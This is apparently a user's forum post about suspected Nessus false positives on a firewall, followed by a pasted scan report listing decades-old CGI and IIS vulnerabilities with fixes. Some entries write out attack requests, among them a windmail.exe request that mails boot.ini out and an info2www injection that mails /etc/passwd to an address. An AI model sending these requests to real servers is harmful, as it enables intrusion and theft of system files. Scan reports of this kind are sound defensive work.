I am using the latest stable version with recent plugins. I performed a large scan by breaking the list of Ips into two groups. I scanned the first group and got a lot of vulnerabilities on port 80: The file /wwwboard/passwd.txt exists
The 'wrap' CGI is installed. This CGI allows anyone to get a listing for any directory with mode +755. The 'windmail.exe' cgi is installed. It may be possible for an attacker to reconfigure the remote web server by requesting : GET /scripts/wsisa.dll/WService=anything?WSMadmin The Cobalt 'siteUserMod' CGI is installed. and more. The problem with this report is that the device in question is a firewall and absolutely DOESN'T have any of these vulnerabilities. Even more curious is that Nessus reports that I have IIS running on a server that also appears to be Unix. I scanned the 2nd group of targets and got similar results (actually, all the above and more). The 2nd target is an *IP without a PC attached (I was just making sure)*. How can these false positives sneak in? How come they're so detailed? This is causing me a great deal of suspicion about the results of the entire scan. When I re-ran the scans, I didn't get these results. I've re-run the scans multiple times and have yet to reproduce these results. Are they really there or not? Ty Full report of one of the IPs List of open ports : http (80/tcp) (Security hole found) general/udp (Security notes found) general/tcp (Security warnings found) Vulnerability found on port http (80/tcp) The file /wwwboard/passwd.txt exists. This file is installed by default with Matt's Script wwwboard software. This can be a high risk vulnerability if the password used is the same for other services. An attacker can easily take over the board by cracking the passwd. Solution : Configure the wwwadmin.pl script to put the passwd.txt file somewhere else. Risk factor : High CVE : CVE-1999-0953 Vulnerability found on port http (80/tcp) The 'wrap' CGI is installed. This CGI allows anyone to get a listing for any directory with mode +755. ** Note that all implementations of 'wrap' are not vulnerable. See the relevant CVE entry. Solution : remove it from /cgi-bin. Risk factor : Low/Medium CVE : CVE-1999-0149 Vulnerability found on port http (80/tcp) The 'windmail.exe' cgi is installed. Some versions of this CGI script have a security flaw that lets an attacker execute arbitrary commands on the remote server. To test this, make the following request : GET /cgi-bin/windmail.exe?-n%20c:\[EMAIL PROTECTED] (replace [EMAIL PROTECTED] by your real email address). If you receive the content of the file boot.ini, then you are vulnerable. Solution : remove it from /cgi-bin. See www.geocel.com for a new version. Risk factor : Serious CVE : CAN-2000-0242 Vulnerability found on port http (80/tcp) It may be possible for an attacker to reconfigure the remote web server by requesting : GET /scripts/wsisa.dll/WService=anything?WSMadmin Solution : Edit the ubroker.properties file and change AllowMsngrCmds = 1 to : AllowMsngrCmds = 0 Risk factor : High CVE : CAN-2000-0127 Vulnerability found on port http (80/tcp) The 'websendmail' CGI is installed. This CGI has a well known security flaw that lets an attacker execute arbitrary commands with the privileges of the http daemon (usually root or nobody). Solution : Remove it from /cgi-bin. Risk factor : Serious CVE : CVE-1999-0196 Vulnerability found on port http (80/tcp) The 'webgais' CGI is installed. This CGI has a well known security flaw that lets an attacker execute arbitrary commands with the privileges of the http daemon (usually root or nobody). Solution : remove it from /cgi-bin Risk factor : Serious CVE : CVE-1999-0176 Vulnerability found on port http (80/tcp) At least one of these file or directories is world readable : /webcart/orders/ /webcart/orders/import.txt /webcart/carts/ /webcart/config/ /webcart/config/clients.txt /webcart-lite/orders/import.txt /webcart-lite/config/clients.txt This misconfiguration may allow an attacker to gather the credit card numbers of your clients. Solution : Do not make directories world readable. Risk factor : High CVE : CAN-1999-0610 Vulnerability found on port http (80/tcp) It is possible to fill the hard disk of a server running OmniHTTPd by issuing the request : http://omni.server/cgi-bin/visadmin.exe?user=guest This allows an attacker to crash your web server. This script checks for the presence of the faulty CGI, but does not execute it. Solution : remove visadmin.exe from /cgi-bin. Risk factor : Medium/High CVE : CAN-1999-0970 Vulnerability found on port http (80/tcp) The 'uploader.exe' CGI is installed. This CGI has a well known security flaw that lets anyone upload arbitrary CGI on the server, and then execute them. Solution : remove it from /cgi-win. Risk factor : Serious CVE : CVE-1999-0177 Vulnerability found on port http (80/tcp) The 'upload.cgi' cgi is installed. This CGI has a well known security flaw that lets anyone upload arbitrary files on the remote web server. Solution : remove it from /cgi-bin. Risk factor : Serious Vulnerability found on port http (80/tcp) The Cobalt 'siteUserMod' CGI is installed. Older versions of this CGI allow any user to change the administrator password. Make sure you are running the latest version. Solution : RaQ 1 Users, download : ftp://ftp.cobaltnet.com/ pub/experimental/security/siteUserMod/RaQ1-Security-3.6.pkg RaQ 2 Users, download : ftp://ftp.cobaltnet.com/ pub/experimental/security/siteUserMod/RaQ2-Security-2.94.pkg RaQ 3 Users, download : ftp://ftp.cobaltnet.com/ pub/experimental/security/siteUserMod/RaQ3-Security-2.2.pkg Risk factor : High CVE : CAN-2000-0117 Vulnerability found on port http (80/tcp) The remote web server has one of these shells installed in /cgi-bin : ash, bash, csh, ksh, sh, tcsh, zsh Leaving executable shells in the cgi-bin directory of a web server may allow an attacker to execute arbitrary commands on the target machine with the privileges of the http daemon (usually root or nobody). Solution : Remove all the shells from /cgi-bin. Risk factor : Serious CVE : CAN-1999-0509 Vulnerability found on port http (80/tcp) At least one of these CGI scripts is installed : hello.bat echo.bat They allow any attacker to execute commands with the privileges of the web server process. Solution : Delete all the *.bat files from your cgi-bin/ directory Risk factor : High CVE : CAN-2000-0213 Vulnerability found on port http (80/tcp) The 'plusmail' CGI is installed. Some versions of this CGI have a well known security flaw that lets an attacker execute arbitrary commands with the privileges of the http daemon (usually root or nobody). Solution : remove it from /cgi-bin. No patch yet Risk factor : Serious CVE : CAN-2000-0074 Vulnerability found on port http (80/tcp) The 'Perl' CGI is installed and can be launched as a CGI. This is equivalent to giving a free shell to an attacker, with the http server privileges (usually root or nobody). Solution : remove it from /cgi-bin Risk factor : Serious CVE : CAN-1999-0509 Vulnerability found on port http (80/tcp) It is possible to read the include file of PCCS-Mysql, dbconnect.inc on the remote server. This include file contains information such as the username and password used to connect to the database. Solution: Versions 1.2.5 and later are not vulnerable to this issue. A workaround is to restrict access to the .inc file. Risk factor : High CVE : CVE-2000-0707 Vulnerability found on port http (80/tcp) The 'nph-publish.cgi' is installed. This CGI has a well known security flaw that lets an attacker to execute arbitrary commands with the privileges of the http daemon (usually root or nobody). Solution : remove it from /cgi-bin. Risk factor : Serious CVE : CAN-1999-1177 Vulnerability found on port http (80/tcp) The CGI /scripts/tools/newdsn.exe is present. This CGI allows any attacker to create files anywhere on your system if your NTFS permissions are not tight enough, and can be used to overwrite DSNs of existing dabases. Solution : Remove newdsn.exe Risk factor : High CVE : CVE-1999-0191 Vulnerability found on port http (80/tcp) The file /admin-serv/config/admpw is readable. This file contains the encrypted password for the Netscape administration server. Although it is encrypted, an attacker may attempt to crack it by brute force. Solution : Remove read access permissions for this file and/or stop the netscape admininistration server. Risk factor : Medium Vulnerability found on port http (80/tcp) The file /ncl_items.html exists on the remote system. It is very likely that this file will allow an attacker to reconfigure your Tektronix printer. An attacker can use this to prevent the users of your network from working properly by preventing them from printing their files. Solution : Filter incoming traffic to port 80 to this device, or disable the Phaserlink webserver on the printer (can be done by requesting http://printername/ncl_items?SUBJECT=2097) Risk factor : Low CVE : CAN-1999-1508 Vulnerability found on port http (80/tcp) The web server is probably susceptible to a common IIS vulnerability discovered by 'Rain Forest Puppy'. This vulnerability enables an attacker to execute arbitrary commands on the server with Administrator Privileges. See Microsoft security bulletin (MS99-025) for patch information. Also, BUGTRAQ ID 529 on www.securityfocus.com (http://www.securityfocus.com/bid/529) Risk factor : High CVE : CVE-1999-1011 Vulnerability found on port http (80/tcp) The CGI /scripts/tools/ctss.idc is present. This CGI allows an attacker to view and modify SQL database contents. Solution : Remove it Risk factor : Serious Vulnerability found on port http (80/tcp) The 'jj' CGI is installed. This CGI has a well known security flaw that lets an attacker execute arbitrary commands with the privileges of the http daemon (usually root or nobody). Solution : Remove it from /cgi-bin. Risk factor : Serious CVE : CVE-1999-0260 Vulnerability found on port http (80/tcp) The 'info2www' CGI is installed. This CGI has a well known security flaw that lets an attacker execute arbitrary commands with the privileges of the http daemon (usually root or nobody). Example: http://target/cgi-bin/info2www?'(../../../bin/mail your@email < /etc/passwd|)' Solution : Remove it from /cgi-bin or upgrade. Risk factor : Serious CVE : CVE-1999-0266 Vulnerability found on port http (80/tcp) The use of /iisadmin is not limited to the loopback address. Anyone can use it to reconfigure your web server. Solution : Restrict access to /iisadmin through the IIS ISM Risk factor : High Vulnerability found on port http (80/tcp) Several versions of the 'icat' CGI allow a remote user to read arbitrary file on the target system. Make sure you are running the latest version of icat. Risk factor : Medium/High. Solution : Upgrade to the latest version of icat CVE : CAN-1999-1069 Vulnerability found on port http (80/tcp) The 'handler' cgi is installed. This CGI has a well known security flaw that lets anyone execute arbitrary commands with the privileges of the http daemon (root or nobody). Solution : remove it from /cgi-bin. Risk factor : Serious CVE : CVE-1999-0148 Vulnerability found on port http (80/tcp) The 'guestbook.pl' is installed. This CGI has a well known security flaw that lets anyone execute arbitrary commands with the privileges of the http daemon (root or nobody). Solution : remove it from /cgi-bin. Risk factor : Serious CVE : CVE-1999-0237 Vulnerability found on port http (80/tcp) The 'guestbook.cgi' is installed. This CGI has a well known security flaw that lets anyone execute arbitrary commands with the privileges of the http daemon (root or nobody). Solution : remove it from /cgi-bin. Risk factor : Serious CVE : CVE-1999-0237 Vulnerability found on port http (80/tcp) The 'glimpse' cgi is installed. This CGI has a well known security flaw that lets anyone execute arbitrary commands with the privileges of the http daemon (root or nobody). Note that we could not actually check for the presence of this vulnerability, so you may be using a patched version. Solution : remove it from /cgi-bin. Risk factor : Serious CVE : CVE-1999-0147 Vulnerability found on port http (80/tcp) The dll '/_vti_bin/_vti_aut/dvwssr.dll' seems to be present. This dll contains a bug which allows anyone with authoring web permissions on this system to alter the files of other users. In addition to this, this file is subject to a buffer overflow which allows anyone to execute arbitrary commands on the server and/or disable it Solution : delete /_vti_bin/_vti_aut/dvwssr.dll Risk factor : High See also : http://www.wiretrip.net/rfp/p/doc.asp?id=45&iface=1 CVE : CVE-2000-0260 Vulnerability found on port http (80/tcp) The remote web server appears to be running with Frontpage extensions and lets the file 'authors.pwd' to be downloaded by everyone. This is a security concern since this file contains sensitive data. Solution : Contact Microsoft for a fix. Risk factor : Medium CVE : CVE-1999-0386 Vulnerability found on port http (80/tcp) IIS comes with the sample site 'ExAir'. Unfortunately, one of its pages, namely /iissamples/exair/search/search.asp, may be used to make IIS hang, thus preventing it from answering to legitimate clients. Solution : Delete the 'ExAir' sample IIS site Risk factor : Medium CVE : CVE-1999-0449 Vulnerability found on port http (80/tcp) IIS comes with the sample site 'ExAir'. Unfortunately, one of its pages, namely /iissamples/exair/search/query.asp, may be used to make IIS hang, thus preventing it from answering to legitimate clients. Solution : Delete the 'ExAir' sample IIS site Risk factor : Medium. CVE : CVE-1999-0449 Vulnerability found on port http (80/tcp) IIS comes with the sample site 'ExAir'. Unfortunately, one of its pages, namely /iissamples/exair/search/advsearch.asp, may be used to make II hang, thus preventing it from answering to legitimate clients. Risk factor : Medium/High. Solution : Delete the 'ExAir' sample IIS site CVE : CVE-1999-0449 Vulnerability found on port http (80/tcp) The Excite for Webservers is installed. This CGI has a well known security flaw that lets anyone execute arbitrary commands with the privileges of the http daemon (root or nobody). Version 1.1 and newer are patched. Solution : if you are running a version older than 1.1, then upgrade it. Risk factor : Serious CVE : CVE-1999-0279 Vulnerability found on port http (80/tcp) ServletExec has a servlet called 'UploadServlet' in its server side classes. UploadServlet, when invokable, allows an attacker to upload any file to any directory on the server. The uploaded file may have code that can later be executed on the server, leading to remote command execution. Solution : Remove it Risk Factor: Serious CVE : CAN-2000-1024 Vulnerability found on port http (80/tcp) The script /cart/cart.cgi is present. If this shopping cart system is the Dansie Shopping Cart, and if it is older than version 3.0.8 then it is very likely that it contains a backdoor which allows anyone to execute arbitary commands on this system. Solution : use another cart system Risk factor : High CVE : CAN-2000-0252 Vulnerability found on port http (80/tcp) The 'Count.cgi' cgi is installed. This CGI has a well known security flaw that lets anyone execute arbitrary commands with the privileges of the http daemon (root or nobody). Solution : remove it from /cgi-bin. Risk factor : Serious CVE : CVE-1999-0021 Vulnerability found on port http (80/tcp) 'cgiwrap' is installed. This CGI has a well known security flaw that lets anyone execute arbitrary commands with the privileges of the http daemon (root or nobody). ** Note that all version of cgiwrap are not affected by this problem ! Consult your vendor. Solution : remove it from /cgi-bin. Risk factor : Serious CVE : CAN-1999-1530 Vulnerability found on port http (80/tcp) The 'campas' cgi is installed. This CGI has a well known security flaw that lets anyone execute arbitrary commands with the privileges of the http daemon (root or nobody). Solution : remove it from /cgi-bin. Risk factor : Serious CVE : CVE-1999-0146 Vulnerability found on port http (80/tcp) RedHat Linux 6.0 installs by default a squid cache manager cgi script with no restricted access permissions. This script could be used to perform a port scan from the cgi-host machine. Solution : If you are not using the box as a Squid www proxy/cache server then uninstall the package by executing: /etc/rc.d/init.d/squid stop rpm -e squid If you want to continue using the Squid proxy server software, make the following actions to tighten security access to the manager interface: mkdir /home/httpd/protected-cgi-bin mv /home/httpd/cgi-bin/cachemgr.cgi /home/httpd/protected-cgi-bin/ And add the following directives to /etc/httpd/conf/access.conf and srm.conf: --- start access.conf segment --- # Protected cgi-bin directory for programs that # should not have public access order deny,allow deny from all allow from localhost #allow from .your_domain.com AllowOverride None Options ExecCGI --- end access.conf segment --- --- start srm.conf segment --- ScriptAlias /protected-cgi-bin/ /home/httpd/protected-cgi-bin/ --- end srm.conf segment --- Risk Factor: High CVE : CVE-1999-0710 Vulnerability found on port http (80/tcp) The Cart32 e-commerce shopping cart is installed. This software contains several security flaws : - it may contain a backdoor - users may be able to change the admin password remotely You should use something else. See also : http://www.cerberus-infosec.co.uk/advcart32.html Solution : use another shopping cart software Risk factor : High CVE : CAN-2000-0429 Vulnerability found on port http (80/tcp) BizDB is a web databse integration product using perl CGI scripts. One of the scripts, bizdb-search.cgi, passes a variable's contents to an unchecked open() call and can therefore be made to execute commands at the privilege level of the webserver. The variable is dbname, and if passed a semicolon followed by shell commands they will be executed. This cannot be exploited from a browser, as the software checks for a referrer field in the HTTP request. A valid referrer field can however be created and sent programmatically or via a network utility like netcat. see also : http://www.hack.co.za/daem0n/cgi/cgi/bizdb.htm Risk factor : Serious CVE : CAN-2000-0287 Vulnerability found on port http (80/tcp) The 'bboard' servlet is installed in /servlet/sunexamples.BBoardServlet. This servlet has a well known security flaw that lets anyone execute arbitrary commands with the privileges of the http daemon (root or nobody). Solution : remove it. Risk factor : Serious CVE : CVE-2000-0629 Vulnerability found on port http (80/tcp) The file /site/eg/source.asp is present. This file comes with the Apache::ASP package and allows anyone to write to files in the same directory. An attacker may use this flaw to upload his own scripts and execute arbitrary commands on this host. Solution : Upgrade to Apache::ASP 1.95 Risk factor : Serious CVE : CAN-2000-0628 Vulnerability found on port http (80/tcp) The 'get32.exe' cgi is installed. This CGI has a well known security flaw that lets anyone execute arbitrary commands with the privileges of the http daemon (root or nobody). Solution : remove it from /cgi-bin. Risk factor : Serious Vulnerability found on port http (80/tcp) The Sambar webserver is running and the 'mailit.pl' cgi is installed. This CGI takes a POST request from any host and sends a mail to a supplied address. See http://www.toppoint.de/~hscholz/sambar for more information. Solution : remove it from /cgi-bin. Risk factor : Serious Warning found on port http (80/tcp) The 'webdriver' cgi is installed. This CGI usually lets anyone access the Informix databases of the hosts that run it. ** Warning : Nessus only tested the presence of this CGI, it did not ** determine if you specific version is vulnerable to that problem Solution : remove it from /cgi-bin. Risk factor : Serious Warning found on port http (80/tcp) Textor Webmaster's Listre.pl CGI is installed on this host. A security problem in this CGI allows execution of arbitrary commands with the privileges of the web server. Solution: Contact the author for a patch. Risk factor : High Additional information: http://www.securiteam.com/unixfocus/5KP0N005FK.html Warning found on port http (80/tcp) The 'processit' CGI is installed. processit normally returns all environment variables. This gives an attacker valuable information about the configuration of your web server, allowing them to focus their attacks. Solution : Remove it from /cgi-bin. Risk factor : Medium Warning found on port http (80/tcp) The 'printenv' CGI is installed. printenv normally returns all environment variables. This gives an attacker valuable information about the configuration of your web server, allowing them to focus their attacks. Solution : Remove it from /cgi-bin. Risk factor : Medium Warning found on port http (80/tcp) The CGI script ppdscgi.exe, part of the PowerPlay Web Edition package, is installed. Due to design problems as well as some potential web server misconfiguration PowerPlay Web Edition may serve up data cubes in a non-secure manner. Execution of the PowerPlay CGI pulls cube data into files in an unprotected temporary directory. Those files are then fed back to frames in the browser. In some cases it is trivial for an unauthenticated user to tap into those data files before they are purged. Solution : Cognos doesn't consider this problem as being an issue, so they do not provide any solution. Risk factor : Medium Warning found on port http (80/tcp) The 'pagelog.cgi' cgi is installed. This CGI has a well known security flaw that lets an attacker create arbitrary files on the remote server, ending in .txt, and reading arbitrary files ending in .txt or .log *** Warning : this flaw was not tested by Nessus. Check the existence of /tmp/nessus_pagelog_cgi.txt on this host to find out if you are vulnerable or not. Solution : remove it from /cgi-bin. Risk factor : Serious CVE : CAN-2000-0940 Warning found on port http (80/tcp) The 'nph-test-cgi' CGI is installed. This CGI has a well known security flaw that lets an attacker get a listing of the /cgi-bin directory, thus discovering which CGIs are installed on the remote host. Solution : remove it from /cgi-bin. Risk factor : Serious Warning found on port http (80/tcp) The file /_ncl_items.shtml exists on the remote web server. If the remote host is a Tektronix printer, then this page allows anyone to reconfigure it without any authentication means whatsoever. An attacker may use this flaw to conduct a denial of service attack against your business by preventing legitimate users from printing their work, or against your network, by changing the IP address of the printer so that it conflicts with the IP address of your file server. Solution : Contact Tektronix for a patch and filter incoming traffic to this port Risk factor : Low CVE : CAN-2001-0484 Warning found on port http (80/tcp) The 'mailnews' cgi is installed. This CGI has a well known security flaw that lets an attacker execute arbitrary commands with the privileges of the http daemon (usually root or nobody). Solution : remove it from /cgi-bin. Risk factor : Serious Warning found on port http (80/tcp) The remote web server appears to be running with Frontpage extensions. You should double check the configuration since a lot of security problems have been found with FrontPage when the configuration file is not well set up. Risk factor : High if your configuration file is not well set up CVE : CVE-1999-0386 Warning found on port http (80/tcp) The 'finger' cgi is installed. It is usually not a good idea to have such a service installed, since it usually gives more troubles than anything else. Double check that you really want to have this service installed. Solution : remove it from /cgi-bin. Risk factor : Serious CVE : CAN-1999-0197 Warning found on port http (80/tcp) The 'dumpenv' cgi is installed. This CGI gives away too much information about the web server configuration, which will help a cracker. Solution : remove it from /cgi-bin. Risk factor : Low CVE : CAN-1999-1178 Warning found on port http (80/tcp) Some Web Servers use a file called /robot(s).txt to make search engines and any other indexing tools visit their WebPages more frequently and more efficiently. By connecting to the server and requesting the /robot(s).txt file, an attacker may gain additional information about the system they are attacking. Such information as, restricted directories, hidden directories, cgi script directories and etc. Take special care not to tell the robots not to index sensitive directories, since this tells attackers exactly which of your directories are sensitive. Risk factor : Medium Warning found on port http (80/tcp) robot.txt contains the following: <HTML> <!-- Copyright (c) 1995-2001 Nortel Networks Corporation --> <HEAD> <TITLE>Instant Internet - Requested Page Not Found</TITLE> <SCRIPT LANGUAGE="JavaScript"> var popupWindow = null function popup() { popupWindow = open('', "ii_popup_window", 'width=500,height=600,scrollbars=yes,resizable=yes,status=no,menubar=no' ) if (navigator.appName == "Netscape") popupWindow.focus() } </SCRIPT> <META HTTP-EQUIV="Pragma" CONTENT="no-cache"> </HEAD> <BODY LINK="#FFFFFF" VLINK="#FFFFFF"> <CENTER><TABLE WIDTH=640> <TR> <TH ALIGN=CENTER BGCOLOR="#003399"> <FONT FACE="Arial,Helvetica,Sans-Serif"> <B><FONT COLOR="#FF9900" SIZE=6>BayStack</FONT></B> <B><FONT COLOR="#FFFFFF" SIZE=6>Instant Internet</FONT></B></FONT> </TH> </TR> </TABLE> <TABLE WIDTH=640 CELLPADDING=10> <TR ALIGN=CENTER VALIGN=TOP> <TD ALIGN=LEFT WIDTH=130 BGCOLOR="#FF9900"> <FONT FACE="Arial,Helvetica,Sans-Serif"> <TABLE WIDTH="100%"> <TR> <TD ALIGN=CENTER BGCOLOR="#003399"> <FONT FACE="Arial,Helvetica,Sans-Serif"> <A HREF="/"><B><FONT SIZE=2>Home</FONT></B></A> </FONT> </TD> </TR> <TR> <TD ALIGN=CENTER BGCOLOR="#6699CC"> <FONT FACE="Arial,Helvetica,Sans-Serif"> <A HREF="/admin"><B><FONT SIZE=2>Admin</FONT></B></A> </FONT> </TD> </TR> </TABLE> <BR></FONT> </TD> <TD ALIGN=RIGHT BGCOLOR="#FFFFF0"> <FONT FACE="Arial,Helvetica,Sans-Serif"> <B><FONT COLOR="#990000" SIZE=5>Requested Page Not Found</FONT></B><BR><P ALIGN=LEFT> <TABLE WIDTH=460 BORDER=0 CELLSPACING=0 CELLPADDING=2> <TR> <TD WIDTH="33%"> <FONT FACE="Arial,Helvetica,Sans-Serif"> </FONT> </TD> <TD WIDTH="33%"> <FONT FACE="Arial,Helvetica,Sans-Serif"> </FONT> </TD> <TD WIDTH="33%"> <FONT FACE="Arial,Helvetica,Sans-Serif"> </FONT> </TD> </TR> </TABLE> </FONT> </TD> </TR> </TABLE> </BODY> </HTML> Warning found on port http (80/tcp) The rpm_query CGI is installed. This CGI allows anyone who can connect to this web server to obtain the list of the installed RPMs. This allows attacker to determine the version number of your installed services, hence making their attacks more accurate. Solution : remove this CGI from cgi-bin/ Risk factor : Low CVE : CVE-2000-0192 Information found on port http (80/tcp) The remote host seems to be vulnerable to a security problem in CGIEmail (cgicso). The vulnerability is caused by inadequate processing of queries by CGIEmail's cgicso and results in a command execution vulnerability. Impact: The server can be compromised by executing commands as the web server's running user (usually 'nobody'). Solution: Modify cgicso.h to contain a strict setting of your finger host. Example: Define the following in cgicso.h: #define CGI_CSO_HARDCODE #define CGI_CSO_FINGERHOST 'localhost' Risk Factor: High Additional information: http://www.securiteam.com/exploits/5TP0W005FE.html Information found on port general/udp For your information, here is the traceroute to 66.123.140.226 : 192.168.2.1 10.51.112.1 12.244.112.1 12.244.69.1 12.244.73.2 12.123.17.30 12.122.5.82 12.123.16.241 192.205.32.54 144.232.18.242 144.232.1.46 144.232.254.130 64.164.50.98 64.169.208.113 206.13.29.141 ? 66.120.61.182 ? Warning found on port general/tcp Microsoft Windows 95 and 98 clients have the ability to bind multiple TCP/IP stacks on the same MAC address, simply by having the protocol addded more than once in the Network Control panel. The remote host has several TCP/IP stacks with the same IP binded on the same MAC adress. As a result, it will reply several times to the same packets, such as by sending multiple ACK to a single SYN, creating noise on your network. If several hosts behave the same way, then your network will be brought down. Solution : remove all the IP stacks except one in the remote host Risk factor : Medium
